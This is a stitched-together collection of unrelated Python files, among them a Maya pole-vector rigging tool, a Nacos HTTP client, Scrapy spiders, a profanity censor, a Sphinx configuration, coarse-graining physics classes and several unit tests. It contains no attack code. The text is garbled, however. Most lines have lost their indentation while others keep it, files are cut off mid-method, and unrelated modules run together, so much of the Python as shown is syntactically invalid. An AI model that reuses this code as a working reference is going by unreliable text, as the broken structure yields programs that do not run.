cmds.xform( pole_world_grp.name(), translation = controller_pivot, ws = True )
cmds.xform( pole_world_grp.name(), rotation = controller_rotation, ws = True )
# Object up vector
up_vector_grp = DAG_Node( cmds.group( n = '{0}_upVector_grp'.format( name ), em = True ) )
up_vector_grp.set_parent( self.pole_main_grp )
cmds.pointConstraint( root_joint.name() , up_vector_grp.name() )
# Create bottom chain aim locator
aim_grp = DAG_Node( cmds.group( n = '{0}_aim_grp'.format( name ), em = True ) )
aim_grp.set_parent( self.pole_main_grp )
cmds.aimConstraint ( root_joint.name(), aim_grp.name(),
aimVector = [1, 0, 0],
upVector = [0, 1, 0],
worldUpType = "objectrotation",
worldUpVector = [-1, 0, 0],
worldUpObject = up_vector_grp.name() )
cmds.pointConstraint( controller.name(), aim_grp.name() )
# Create pole vector parent groups
pole_controller_grp = DAG_Node( cmds.group( n = '{0}_poleController_grp'.format( name ), em = True ) )
pole_rotate_grp = DAG_Node( cmds.group( n = '{0}_poleRotate_grp'.format( name ), em = True ) )
pole_rotate_grp.set_parent( pole_controller_grp )
pole_controller_grp.set_parent( aim_grp )
# Set controller orientation on main pole group
cmds.xform( pole_controller_grp.name(), translation = controller_pivot, ws = True )
cmds.xform( pole_controller_grp.name(), rotation = controller_rotation, ws = True )
# Connect rotate group's rotation Y,Z for twist follow
cmds.connectAttr( '{0}.rotateY'.format( controller.name() ), '{0}.rotateY'.format( pole_rotate_grp.name() ) )
cmds.connectAttr( '{0}.rotateZ'.format( controller.name() ), '{0}.rotateZ'.format( pole_rotate_grp.name() ) )
# Create and attach new custom attribute
position_follow_str = 'position_follow'
rotation_follow_str = 'rotation_follow'
if not cmds.objExists( '{0}.{1}'.format( pole_vector.name(), position_follow_str ) ):
cmds.addAttr( pole_vector.name(), longName = position_follow_str, attributeType = 'double', min = 0, max = 1, k = True )
if not cmds.objExists( '{0}.{1}'.format( pole_vector.name(), rotation_follow_str ) ):
cmds.addAttr( pole_vector.name(), longName = rotation_follow_str, attributeType = 'double', min = 0, max = 1, k = True )
cmds.setAttr( '{0}.{1}'.format( pole_vector.name(), position_follow_str ), 1 )
cmds.setAttr( '{0}.{1}'.format( pole_vector.name(), rotation_follow_str ), 1 )
# Constraint pole parent to world and follow grps
point_constraint = DAG_Node( cmds.pointConstraint( pole_world_grp.name(), pole_rotate_grp.name(), pole_parent_grp.name() )[0] )
orient_constraint = DAG_Node( cmds.orientConstraint( pole_world_grp.name(), pole_rotate_grp.name(), pole_parent_grp.name() )[0] )
position_constraint_weights = cmds.pointConstraint( point_constraint.name(), weightAliasList = True, query = True )
rotation_constraint_weights = cmds.orientConstraint( orient_constraint.name(), weightAliasList = True, query = True )
cmds.connectAttr( '{0}.{1}'.format( pole_vector.name(), position_follow_str ), '{0}.{1}'.format( point_constraint.name(), position_constraint_weights[1] ) )
cmds.connectAttr( '{0}.{1}'.format( pole_vector.name(), rotation_follow_str ), '{0}.{1}'.format( orient_constraint.name(), rotation_constraint_weights[1] ) )
Maya_Util().reverse_node( parent_attr = '{0}.{1}'.format( pole_vector.name(), position_follow_str ),
child_attr = '{0}.{1}'.format( point_constraint.name(), position_constraint_weights[0] ),
node_name = '{0}_positionFollow_node'.format( name ) )
Maya_Util().reverse_node( parent_attr = '{0}.{1}'.format( pole_vector.name(), rotation_follow_str ),
child_attr = '{0}.{1}'.format( orient_constraint.name(), rotation_constraint_weights[0] ),
node_name = '{0}_rotationFollow_node'.format( name ) )
cmds.select( cl = True )
        sys.stdout.write( '// Result: No Flip Pole Vector is finished!' )
return True
'''
========================================================================
----> Build Rig Sample <----
========================================================================
'''
def sample( self, *args ):
# Build joint chain
cmds.select( cl = True )
chain1_jnt = cmds.joint( n = 'chain1_jnt', p = [0, 6, 0] )
cmds.joint( n = 'chain2_jnt', p = [0, 3, 1] )
chain3_jnt = cmds.joint( n = 'chain3_jnt', p = [0, 0, 0] )
# Build ikHandle
chain_ikHandle = cmds.ikHandle ( n = 'chain_ikHandle', startJoint = chain1_jnt, endEffector = chain3_jnt, sol = 'ikRPsolver' )[0]
# Build pole vector
pole_vector_loc = cmds.spaceLocator( n = 'pole_vector_loc' )[0]
cmds.setAttr( '{0}.translateY'.format( pole_vector_loc ), 3 )
cmds.setAttr( '{0}.translateZ'.format( pole_vector_loc ), 2 )
cmds.poleVectorConstraint( pole_vector_loc, chain_ikHandle )
# Build controller
controller = cmds.circle ( nr = [0, 1, 0], r = 1 )[0]
cmds.pointConstraint( controller, chain_ikHandle )
# Run Standalone code
No_Flip_Pole_Vector().build( root_joint = chain1_jnt, controller = controller, pole_vector = pole_vector_loc, name = 'example' )
'''
========================================================================
----> Code Sample <----
========================================================================
'''
def code_sample( self, *args ):
code = '''
import maya.cmds
import no_flip_pole_vector_tool as nfpv
# Show ui
nfpv.No_Flip_Pole_Vector().show_ui()
"""
========================================================================
----> Run Standalone code <----
========================================================================
"""
nfpv.No_Flip_Pole_Vector().build( root_joint = None, controller = None, pole_vector = None, name = 'example' )
'''
if cmds.window( 'code_sample_window', exists = True, q = True ):
cmds.deleteUI( 'code_sample_window' )
cmds.window( 'code_sample_window', title = 'Code Sample' )
cmds.paneLayout()
cmds.scrollField( editable = False, text = code.replace( ' ', '' ) )
cmds.showWindow()
'''
========================================================================
----> About No Flip Pole Vector <----
========================================================================
'''
def about( self, *args ):
about = '''
"""
========================================================================
----> No Flip Pole Vector <----
========================================================================
"""
This tool builds a no flip pole vector. After passing in a root joint,
main controller, and pole vector the tool will allow the pole vector to
follow the main controller or switch to world space.
If you have any questions email me at Nicholas.Silveira@gmail.com
'''
if cmds.window( 'about_window', exists = True, q = True ):
cmds.deleteUI( 'about_window' )
cmds.window( 'about_window', title = 'About' )
cmds.paneLayout()
cmds.scrollField( editable = False, text = about.replace( ' ', '' ) )
cmds.showWindow()
'''
========================================================================
----> Maya Utilities <----
========================================================================
'''
class Maya_Util():
'''
========================================================================
----> Create a Maya reverse node <----
========================================================================
'''
def reverse_node ( self, parent_attr, child_attr, node_name = '' ):
"""
*Arguments:*
* ``parent_attr`` Pass the parent attribute.
* ``child_attr`` Pass the child attribute.
*Keyword Arguments:*
* ``node_name`` Pass a node name.
*Returns:*
* ``node`` Returns reverse node
"""
        node = cmds.shadingNode( 'reverse', name = node_name, asUtility = True )
        cmds.connectAttr( parent_attr, '{0}.inputX'.format( node ) )
        cmds.connectAttr( '{0}.outputX'.format( node ), child_attr )
        return node
'''
========================================================================
----> DAG Node Utilities <----
========================================================================
'''
class DAG_Node():
"""
*Arguments:*
* ``node`` Makes a DAG instance from passed node
*Examples:* ::
import maya.cmds as cmds
import no_flip_pole_vector_tool as nfpv
exampleA_grp = nfpv.DAG_Node( cmds.group( n = 'exampleA_grp', em = True ) )
exampleB_grp = nfpv.DAG_Node( cmds.group( n = 'exampleB_grp', em = True ) )
exampleA_grp.set_parent(exampleB_grp)
print exampleA_grp.parent()
print exampleA_grp.name()
"""
def __init__( self, node ):
selection_list = OpenMaya.MSelectionList()
selection_list.add( node )
self.m_obj = OpenMaya.MObject()
selection_list.getDependNode( 0, self.m_obj )
'''
========================================================================
----> DAG Full Path Name <----
========================================================================
'''
def name( self ):
"""
*Returns:*
* ``node_name`` Returns DAG's full path name.
"""
nodeFn = OpenMaya.MFnDagNode( self.m_obj )
node_name = nodeFn.fullPathName()
return node_name
'''
========================================================================
----> DAG Parent <----
========================================================================
'''
def parent( self ):
"""
*Returns:*
* ``node_parent`` Returns DAG's parent or None.
"""
node_parent = cmds.listRelatives( self.name(), parent = True, f = True )
if node_parent:
return DAG_Node( node_parent[0] )
else:
return None
'''
========================================================================
----> Set DAG Parent <----
========================================================================
'''
def set_parent( self, parent ):
cmds.parent( self.name(), parent.name() )
|
#!/usr/bin/env python
"""
SINGLETON
Use the Singleton pattern when:
1. there must be exactly one instance of a class, and it must be
accessible to clients from a well-known access point.
2. the sole instance should be extensible by subclassing, and clients
should be able to use an extended instance without modifying their code.
"""
import logging
class Connection(object):
"""
Singleton
1. Defines an Instance operation that lets clients access its unique
instance.
2. May be responsible for creating its own unique instance.
"""
    def __new__(cls):
        if '_connection' not in cls.__dict__:
            cls._connection = object.__new__(cls)
            logging.basicConfig(level=logging.INFO)
            logging.info('New database connection created!')
        logging.info('Connection established.')
        return cls._connection
if __name__ == "__main__":
c = Connection()
d = Connection()
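    # Quick check of the Singleton behaviour described in the docstring above:
    # both names refer to the same object, and the "created" log line only
    # appears once.
    assert c is d
    print('c is d:', c is d)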
|
import socket
from http import HTTPStatus
from urllib.request import Request, urlopen, ProxyHandler, build_opener
from urllib.parse import urlencode, unquote_plus, quote, quote_plus
from urllib.error import HTTPError, URLError
class ClientBase:
def __init__(self, nacos_host: str, api_level: str = 'v1'):
self.host = nacos_host
self.level = api_level
self.base_url = f'{nacos_host}/nacos/{api_level}'
    def handle(self, url: str, headers: dict = None, params: dict = None, data: dict = None, method: str = 'GET'):
        # Avoid mutable default arguments; fall back to fresh empty dicts.
        headers = headers or {}
        params = params or {}
        data = data or {}
def _get_params_str():
params_list = []
for key in params.keys():
value = params.get(key, None)
if value is not None:
if not isinstance(value, str):
value = str(value)
params_list.append(f'{key}={quote_plus(value)}')
return '&'.join(params_list)
try:
url += '?' + _get_params_str()
req = Request(self.base_url + url, headers=headers, data=urlencode(data).encode(), method=method)
resp = urlopen(req)
response = resp.read()
resp.close()
return response
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
raise Exception("Insufficient privilege.")
else:
raise Exception(e)
except socket.timeout:
raise Exception(f"{self.host} request timeout")
except URLError as e:
raise Exception(f"{self.host} connection error:{e.reason}")
|
import logging
from django.contrib.auth.models import User
from unplugged import RelatedPluginField, Schema, fields
from wampyre.realm import realm_manager
from ...plugins import NotifierPlugin
logger = logging.getLogger(__name__)
class MultiNotifierSchema(Schema):
notifiers = fields.List(
RelatedPluginField(plugin_type=NotifierPlugin), many=True, default=list
)
class MultiNotifierNotifierHandlerPlugin(NotifierPlugin):
plugin_name = "multinotifier"
config_schema = MultiNotifierSchema
def notify(self, notification):
for notifier in self.config.get("notifiers", []):
notifier.notify(notification)
|
# -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2021-05-20 16:25
from typing import Union, List, Callable
from elit.common.dataset import TransformableDataset
from elit.utils.io_util import read_cells
STS_B_TRAIN = 'http://ixa2.si.ehu.es/stswiki/images/4/48/Stsbenchmark.tar.gz#sts-train.csv'
STS_B_DEV = 'http://ixa2.si.ehu.es/stswiki/images/4/48/Stsbenchmark.tar.gz#sts-dev.csv'
STS_B_TEST = 'http://ixa2.si.ehu.es/stswiki/images/4/48/Stsbenchmark.tar.gz#sts-test.csv'
class SemanticTextualSimilarityDataset(TransformableDataset):
def __init__(self,
data: Union[str, List],
sent_a_col,
sent_b_col,
similarity_col,
delimiter='auto',
transform: Union[Callable, List] = None,
cache=None,
generate_idx=None) -> None:
self.delimiter = delimiter
self.similarity_col = similarity_col
self.sent_b_col = sent_b_col
self.sent_a_col = sent_a_col
super().__init__(data, transform, cache, generate_idx)
def load_file(self, filepath: str):
for i, cells in enumerate(read_cells(filepath, strip=True, delimiter=self.delimiter)):
yield {
'sent_a': cells[self.sent_a_col],
'sent_b': cells[self.sent_b_col],
'similarity': float(cells[self.similarity_col])
}
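
# A minimal usage sketch, not part of the original module. The STS-B column
# indices below (4 = similarity score, 5 and 6 = the sentence pair) are an
# assumption about the benchmark CSV layout, and downloading/caching of the
# archive URL is assumed to be handled by elit's TransformableDataset.
if __name__ == '__main__':
    dev = SemanticTextualSimilarityDataset(STS_B_DEV,
                                           sent_a_col=5,
                                           sent_b_col=6,
                                           similarity_col=4)
    print(dev[0])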
|
from typing import *
import re
class Censorship:
def __init__(self, content: Union[Any, str, None] = None) -> None:
self.content: str = content
def update_content(self, content: Any):
self.content = content
def censor(self):
censored = ["fuck", "shit", "lmao", "lmfao", "porn", "sex", "cock", "ball"]
for censor in censored:
if censor in self.content:
lenned = len(censor)
hashes = "#" * lenned
self.content = self.content.replace(censor, hashes)
self.content = re.sub(
"http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*(),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+",
"[url omitted]",
self.content,
)
return self.content
|
"""Scraper for the 1st District Court of Appeals
CourtID: ohio
Court Short Name: Ohio
Author: Andrei Chelaru
"""
from juriscraper.opinions.united_states.state import ohio
class Site(ohio.Site):
def __init__(self):
super(Site, self).__init__()
self.court_id = self.__module__
self.court_index = 2
self.url = self.make_url(self.court_index, self.year)
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tflib.checkpoint import *
from tflib.ops import *
from tflib.utils import *
from tflib.variable import *
|
# -*- coding: utf-8 -*-
from discord.ext import commands
import discord
client = commands.Bot(command_prefix='.')
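
# A minimal sketch of how this bot object is typically wired up, not part of
# the original file: one test command plus the (commented) run call. The token
# string is a placeholder, not a real credential.
@client.command()
async def ping(ctx):
    """Reply with 'pong' so the prefix and command wiring can be verified."""
    await ctx.send('pong')

# client.run('YOUR_BOT_TOKEN')  # supply a real bot token to start the client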
|
import os
import csv
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request, FormRequest
from product_spiders.fuzzywuzzy import process
from product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader
HERE = os.path.abspath(os.path.dirname(__file__))
class SellUsYourGadgetSpider(BaseSpider):
name = 'sellusyourgadget.co.uk'
allowed_domains = ['sellusyourgadget.co.uk']
start_urls = ['http://sellusyourgadget.co.uk/index.php/home/myProduct']
def __init__(self, *args, **kwargs):
super(SellUsYourGadgetSpider, self).__init__(*args, **kwargs)
csv_file = csv.reader(open(os.path.join(HERE, 'sellusyourgadget_products.csv')))
self.products =[row[0] for row in csv_file]
def parse(self, response):
hxs = HtmlXPathSelector(response)
product_ids = hxs.select('//*[@id="product"]/option/@value').extract()
for id in product_ids:
url = 'http://sellusyourgadget.co.uk/index.php/home/getSubProducts/%s'
yield Request(url % id, callback=self.parse_subproducts, meta={'id': id})
def parse_subproducts(self, response):
hxs = HtmlXPathSelector(response)
#Fix for the HTML code.
html = hxs.extract().replace('<br></h3>','').\
replace('<h3','<div class="item"').\
replace('</p>\n <div','</p></div>\n <div').\
replace('<input type="radio"', '<div class="hd" ').\
replace('checked>','>').\
replace('</p></div>','</div></p></div>').\
replace('</p>\n', '</div></p>\n')
products_hxs = HtmlXPathSelector(text=html)
products = products_hxs.select('//div[@class="item"]')
for product in products:
sub_products = product.select('div[@class="hd"]')
if sub_products:
for sub_product in sub_products:
value = sub_product.select('./@value').extract()[0]
hd = sub_product.select('./text()').extract()[0]
name = ' '.join((product.select('p/text()').extract()[0], hd))
extracted = process.extractOne(name, self.products)
try:
if extracted[1]>=98:
url = 'http://sellusyourgadget.co.uk/index.php/home/getConditions/%s'
yield Request(url % value.split(':')[0], callback=self.parse_options,
meta={'id':response.meta['id'],
'name': name,
'memoryR':value,
'memory':value})
except TypeError:
return
else:
name = product.select('p/text()').extract()[0]
extracted = process.extractOne(name, self.products)
try:
if extracted[1]>=98:
value = product.select('p/input/@value').extract()[0]
url = 'http://sellusyourgadget.co.uk/index.php/home/getConditions/%s'
yield Request(url % value.split(':')[0], callback=self.parse_options,
meta={'id':response.meta['id'],
'name':name,
'memoryR':value,
'memory':value})
except TypeError:
return
def parse_options(self, response):
'''Gets the percentages to be subtracted to the initial price.
'''
try:
hxs = HtmlXPathSelector(response)
percentages = hxs.select('//input[@name="conditionR"]/@value').extract()
grade_values = dict(zip(['Grade A','Grade B', 'Grade C',
'Grade D', 'Grade E'], percentages))
for grade, percentage in grade_values.iteritems():
yield FormRequest('http://sellusyourgadget.co.uk/index.php/home/getQuote',
method='POST',
formdata={'product':response.meta['id'],
'memoryR':response.meta['memoryR'],
'conditionR':percentage,
'condition':percentage,
'memory':response.meta['memory'],
'tick1':'0',
'tick2':'0',
'tick3':'0',
'tick4':'0',
'price':''},
callback=self.parse_product,
meta={'name': ' '.join((response.meta['name'], grade))})
except TypeError:
return
def parse_product(self, response):
hxs = HtmlXPathSelector(response)
loader = ProductLoader(item=Product(), response=response)
loader.add_value('name', response.meta['name'])
loader.add_xpath('price', '//*[@id="price-text"]/span/text()')
yield loader.load_item()
|
#!/usr/bin/env python
"""
_LoadForMonitoring_
MySQL implementation for loading a job by scheduler status
"""
from WMCore.Database.DBFormatter import DBFormatter
class LoadForMonitoring(DBFormatter):
"""
_LoadForMonitoring_
Load all jobs with a certain scheduler status including
all the joined information.
"""
sql = """SELECT rj.wmbs_id AS jobid, rj.grid_id AS gridid, rj.bulk_id AS bulkid,
st.name AS status, rj.retry_count as retry_count, rj.id AS id,
rj.status_time as status_time, wl.plugin AS plugin, wu.cert_dn AS owner
FROM bl_runjob rj
INNER JOIN bl_status st ON rj.sched_status = st.id
LEFT OUTER JOIN wmbs_users wu ON wu.id = rj.user_id
INNER JOIN wmbs_job wj ON wj.id = rj.wmbs_id
LEFT OUTER JOIN wmbs_location wl ON wl.id = wj.location
WHERE rj.status = :complete
"""
def execute(self, complete = '1', conn = None, transaction = False):
"""
_execute_
Load all jobs either running or not (running by default)
"""
binds = {'complete': complete}
result = self.dbi.processData(self.sql, binds, conn = conn,
transaction = transaction)
return self.formatDict(result)
|
# -*- coding: utf-8 -*-
from scrapy import Spider, Request
from ..items import Article
from ..items import Lien
class MyScraper(Spider):
name = u'myscraper'
    def start_requests(self):
        yield Request(
            url='http://www.google.fr/',
            callback=self.parse,
        )
def parse(self, response):
for i in response:
yield i
|
# documentation build configuration file, created by
# sphinx-quickstart on Thu Jul 23 19:40:08 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os, subprocess
import shlex
import recommonmark
import sphinx_gallery
from recommonmark.parser import CommonMarkParser
from recommonmark.transform import AutoStructify
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '..'))
# -- General configuration ------------------------------------------------
# Version information.
import gluonnlp as nlp
version = nlp.__version__
release = nlp.__version__
# General information about the project.
project = 'gluonnlp'
author = '%s developers' % project
copyright = '2019, %s' % author
github_doc_root = 'http://gluon-nlp.mxnet.io/{}/'.format(str(version))
# add markdown parser
CommonMarkParser.github_doc_root = github_doc_root
extensions = ['recommonmark']
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx',
'sphinx.ext.napoleon',
'sphinx_autodoc_typehints',
'sphinx.ext.mathjax',
'sphinx_gallery.gen_gallery',
'nbsphinx',
'IPython.sphinxext.ipython_console_highlighting',
'IPython.sphinxext.ipython_directive',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
nbsphinx_kernel_name = 'python3'
nbsphinx_allow_errors = True
nbsphinx_timeout = 1200
nbsphinx_execute = 'never'
html_sourcelink_suffix = ''
html_context = {
'display_github': True,
'github_user': 'dmlc',
'github_repo': 'gluon-nlp',
'github_version': 'master',
'conf_py_path': '/docs/',
'last_updated': False,
'commit': True
}
nbsphinx_prolog = """
{% set paths = env.docname.split('/') %}
.. only:: html
:download:`Download this tutorial <{{ "../%s.zip"|format(paths[1]) }}>`
"""
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = ['.rst', '.ipynb', '.md']
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# generate autosummary even if no references
autosummary_generate = True
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = '_static/gluon-logo.svg'
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/gluon.ico'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', '**.ipynb_checkpoints', 'examples/*/*/**.rst', 'model_zoo/*/*/**.rst',
'model_zoo/word_embeddings/tools/extern/*/**.md']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme is set by the make target
# html_theme = os.environ.get('GLUONNLP_THEME', 'rtd')
# on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
# only import rtd theme and set it if want to build docs locally
# if not on_rtd and html_theme == 'rtd':
# import sphinx_rtd_theme
# html_theme = 'sphinx_rtd_theme'
# html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
html_theme = 'mxtheme'
html_theme_path = ['mxtheme']
html_theme_options = {
'primary_color': 'blue',
'accent_color': 'deep_orange',
'header_links' : [
('Install', 'install/install-more', False, ''),
('API', 'api/index', False, ''),
('Community', 'website/index', False, ''),
('Contribute', 'website/contribute', False, ''),
('GitHub', 'https://github.com/dmlc/gluon-nlp/', True, 'fab fa-github'),
],
# custom layout
'fixed_drawer' : True,
'fixed_header' : True,
'header_waterfall' : True,
'header_scroll': True,
# Render footer (Default: True)
'show_footer': False
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Output file base name for HTML help builder.
htmlhelp_basename = project + 'doc'
# -- Options for LaTeX output ---------------------------------------------
# latex_elements = {
# }
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
# latex_documents = [
# (master_doc, '%s.tex' % project, project,
# author, 'manual'),
# ]
intersphinx_mapping = {
'python': ('https://docs.python.org/{.major}'.format(sys.version_info), None),
'mxnet': ('https://mxnet.apache.org/api/python/docs/', None),
'numpy': ('http://docs.scipy.org/doc/numpy/', None),
'scipy': ('http://docs.scipy.org/doc/scipy/reference', None),
'matplotlib': ('http://matplotlib.org/', None),
'nltk': ('http://www.nltk.org/', None),
}
from sphinx_gallery.sorting import ExplicitOrder
# examples_dirs = []
# gallery_dirs = []
# subsection_order = ExplicitOrder([])
def setup(app):
import mxtheme
app.add_directive('card', mxtheme.CardDirective)
app.add_config_value('recommonmark_config', {
'url_resolver': lambda url: github_doc_root + url,
'auto_doc_ref': True
}, True)
app.add_transform(AutoStructify)
app.add_javascript('google_analytics.js')
app.add_javascript('hidebib.js')
app.add_javascript('install-options.js')
app.add_stylesheet('custom.css')
sphinx_gallery_conf = {
'backreferences_dir': 'gen_modules/backreferences',
'doc_module': ('gluonnlp', 'mxnet', 'numpy'),
'reference_url': {
'gluonnlp': None,
'numpy': 'http://docs.scipy.org/doc/numpy-1.9.1'},
'examples_dirs': [],
'gallery_dirs': [],
'subsection_order': ExplicitOrder([]),
'find_mayavi_figures': False,
'filename_pattern': '.py',
'expected_failing_examples': []
}
# Napoleon settings
napoleon_use_ivar = True
napoleon_use_param = True # Required for compatibility with sphinx-autodoc-typehints
# linkcheck settings
import multiprocessing
linkcheck_ignore = [r'http[s]://apache-mxnet.s3*']
linkcheck_retries = 3
linkcheck_workers = int(multiprocessing.cpu_count() / 2)
|
"""
Module coarse_graining implements a Gaussian coarse-graining adapted from
Illing et al., Phys. Rev. Lett. 117, 208002 (2016) following Goldhirsch and
Goldenberg, Eur. Phys. J. E 9, 245–251 (2002).
"""
import numpy as np
class GaussianCG:
"""
Gaussian coarse-graining.
"""
def __init__(self, sigma, r_cut):
"""
Parameters
----------
sigma : float
Length scale of Gaussian function.
r_cut : float
Coarse-graining cut-off radius.
"""
self.sigma = sigma # length scale of Gaussian function
self.r_cut = r_cut # coarse-graining cut-off radius
def function(self, r):
"""
Parameters
----------
r : float
Radius.
Returns
-------
phi : float
Coarse-graining factor at radius r.
"""
if r > self.r_cut: return 0 # coarse-graining function is zero after cut-off
Dg = 2*np.pi*(self.sigma**2)*(1 -
np.exp(-0.5*((self.r_cut/self.sigma)**2))) # normalisation factor
return np.exp(-0.5*((r/self.sigma)**2))/Dg # coarse-graining factor
def factors(self, positions):
"""
Parameters
----------
positions : float array
Coordinates at which coarse-graining is desired.
Returns
-------
CGfactors : Numpy float array
Coarse-graining factors at positions.
"""
return np.array(list(map(
lambda r: self.function(r),
np.sqrt(np.sum(positions**2, axis=-1))
))) # coarse graining factors at positions
class SquareUniformCG:
"""
Square uniform coarse-graining.
"""
def __init__(self, dL):
"""
Parameters
----------
dL : float
Length of square box on which to average.
"""
self.dL = dL # averaging square length
def function(self, position):
"""
Parameters
----------
position : float array
Coordinates.
Returns
-------
phi : float
Coarse-graining factor at position position.
"""
if (np.abs(np.array(position)) > self.dL/2).any(): return 0 # coarse-graining function is zero outside square
        return 1 # and one inside the square
def factors(self, positions):
"""
Parameters
----------
positions : float array
Coordinates at which coarse-graining is desired.
Returns
-------
CGfactors : Numpy float array
Coarse-graining factors at positions.
"""
CGfactors = np.array(list(map(
lambda position:
self.function(position),
positions
)))
sumCGfactors = np.sum(CGfactors)
        if sumCGfactors == 0: return 0
return CGfactors/sumCGfactors # coarse graining factors at positions
class CoarseGraining:
"""
Enables unique calculation of coarse-graining factors and then calculation
    of coarse-graining averages.
"""
def __init__(self, factors_function, positions):
"""
Parameters
----------
factors_function : function
Function of array of coordinates which returns coarse-graining
factors at these coordinates.
positions : float array
Coordinates at which coarse-graining is desired.
"""
self.CGfactors = np.array(factors_function(positions)) # coarse-graining factors at positions
def average(self, var):
"""
Coarse-graining averaging.
Parameters
----------
var : float array
Values of variable to coarse-grain at different positions from
point at which coarse-graining is desired.
Returns
-------
average : float
Coarse-grained variable.
"""
return np.sum(
np.transpose(np.array(self.CGfactors,
ndmin=len(np.array(var).shape)))
*np.array(var), axis=0) # coarse-grained variable
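
# A minimal usage sketch, not part of the original module. It assumes 2D
# positions measured relative to the point where the coarse-grained value is
# wanted, and a scalar observable sampled at each of those positions.
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    positions = rng.uniform(-5, 5, size=(100, 2))  # displacements from the CG point
    var = rng.normal(size=100)                     # observable at each position
    gaussian = GaussianCG(sigma=1.0, r_cut=3.0)    # kernel width and cut-off
    cg = CoarseGraining(gaussian.factors, positions)
    print(cg.average(var))                         # coarse-grained value at the point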
|
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The dogxcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the -uacomment option."""
import re
from test_framework.test_framework import dogxcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import assert_equal
class UacommentTest(dogxcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
self.log.info("test multiple -uacomment")
test_uacomment = self.nodes[0].getnetworkinfo()["subversion"][-12:-1]
assert_equal(test_uacomment, "(testnode0)")
self.restart_node(0, ["-uacomment=foo"])
foo_uacomment = self.nodes[0].getnetworkinfo()["subversion"][-17:-1]
assert_equal(foo_uacomment, "(testnode0; foo)")
self.log.info("test -uacomment max length")
self.stop_node(0)
expected = "Error: Total length of network version string \([0-9]+\) exceeds maximum length \(256\). Reduce the number or size of uacomments."
self.nodes[0].assert_start_raises_init_error(["-uacomment=" + 'a' * 256], expected, match=ErrorMatch.FULL_REGEX)
self.log.info("test -uacomment unsafe characters")
        for unsafe_char in ['/', ':', '(', ')', '₿', '🏃']:
            expected = r"Error: User Agent comment \(" + re.escape(unsafe_char) + r"\) contains unsafe characters."
self.nodes[0].assert_start_raises_init_error(["-uacomment=" + unsafe_char], expected, match=ErrorMatch.FULL_REGEX)
if __name__ == '__main__':
UacommentTest().main()
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020-2021 CERN.
# Copyright (C) 2020-2021 Northwestern University.
# Copyright (C) 2021 TU Wien.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""Test metadata access schema."""
import pytest
from marshmallow.exceptions import ValidationError
from invenio_rdm_records.services.schemas.access import AccessSchema, \
EmbargoSchema
def test_embargo_load_no_until_is_valid():
expected = {
"active": False,
"until": None,
"reason": None
}
valid_no_until = {
"active": False,
}
assert expected == EmbargoSchema().load(valid_no_until)
valid_no_until = {
"active": False,
"until": None,
}
assert expected == EmbargoSchema().load(valid_no_until)
def test_embargo_dump_no_until_is_valid():
valid_no_until = {
"active": False,
}
assert valid_no_until == EmbargoSchema().dump(valid_no_until)
expected = {
"active": False,
}
valid_no_until = {
"active": False,
"until": None,
}
assert expected == EmbargoSchema().dump(valid_no_until)
def test_valid_full():
valid_full = {
"record": "public",
"files": "restricted",
"embargo": {
"active": True,
"until": "2120-10-06",
"reason": "espionage"
},
}
